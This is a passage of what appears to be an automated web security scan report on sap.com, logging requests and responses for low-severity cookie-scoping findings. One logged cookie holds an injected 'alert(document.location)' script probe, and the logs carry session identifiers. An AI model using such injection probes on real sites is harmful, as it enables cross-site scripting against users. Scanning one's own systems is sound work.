User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 43268
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.20. http://www.sap.com/customer-showcase/innovation/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/innovation/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/innovation/index.epx?olt=CG4D999063 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:14 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:14 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:14 GMT
Content-Length: 39995


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.21. http://www.sap.com/customer-showcase/meetcustomers/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/meetcustomers/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/meetcustomers/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 42048
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:38 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:38 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:38 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
11.22. http://www.sap.com/customer-testimonials/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-testimonials/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-testimonials/index.epx?_=1318688501071 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-SAP-Referer: http://www.sap.comzzzzzz=yyyyy
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; mbox=check#true#1318688544|session#1318688461599-607633#1318690344; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:39:12 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:39:12 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:39:12 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:39:12 GMT
Content-Length: 32648


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.23. http://www.sap.com/gwtservice.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservice.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservice.epx?vid=51A3D747-8C02-417D-8F96-AE6E0DDD405D&ReturnURL=http://www.sapbusinessoptimizer.com/&campaigncode=CRM-US10-SGE-FRBUSOPT HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx%3f433fe%27%3balert(document.location)%2f%2ffea0f539288; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 157
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/host.epx?kNtBzmUK9zU
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:30:14 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:30:14 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL%3bCRM-US10-SGE-FRBUSOPT&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL%3bCRM-US10-SGE-FRBUSOPT&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:30:14 GMT; path=/
Set-Cookie: OriginatingURL=http://www.sapbusinessoptimizer.com/; domain=.sap.com; path=/
Set-Cookie: SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; domain=.sap.com; path=/
Set-Cookie: pmeoriginalurl=%2fhost.epx; domain=.sap.com; path=/
Set-Cookie: pmereturnurl=%2fgwtservice.epx; domain=.sap.com; path=/
Set-Cookie: pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:30:14 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.sap.com/host.epx?kNtBzmUK9zU">here</a>.</h2>
</body></html>
11.24. http://www.sap.com/gwtservices/httpBridge.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/httpBridge.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservices/httpBridge.epx?kNtBzmUK9zU=1&action=registrationLayer&refresh=false&redirect=https%3A%2F%2Fwww.sap.com%2Fprofile%2Flogin.epx%3Fpmelayer%3Dtrue%26kNtBzmUK9zU%3D1&dialog=http://www.sap.com/common/formAbandonWarning.epx?kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:34 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:26:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:34 GMT
Content-Length: 7669


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language="javascri
...[SNIP]...
11.25. http://www.sap.com/gwtservices/verifylogin.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /gwtservices/verifylogin.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fforums.sdn.sap.com%2fthread.jspa%3fthreadID%3d2059162%26tstart%3d0; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:48 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:47 GMT
Content-Length: 21

var sap_token = null;
11.26. http://www.sap.com/hana/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /hana/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hana/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 23602
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:17 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:17 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0003,9|INDUSTRY=INDA000003,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:02:17 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.27. http://www.sap.com/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapvirtualevents.com/teched/default.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:34 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:34 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:34 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:34 GMT
Content-Length: 20385


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.28. http://www.sap.com/lines-of-business/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lines-of-business/index.epx?_=1318688587604 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; mbox=check#true#1318688580|session#1318688512533-813903#1318690380; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:40:16 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:40:16 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:40:16 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:40:16 GMT
Content-Length: 24664


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...
11.29. http://www.sap.com/lines-of-business/lines-of-business-spotlight.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /lines-of-business/lines-of-business-spotlight.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lines-of-business/lines-of-business-spotlight.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 22042
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:05 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:05 GMT; path=/
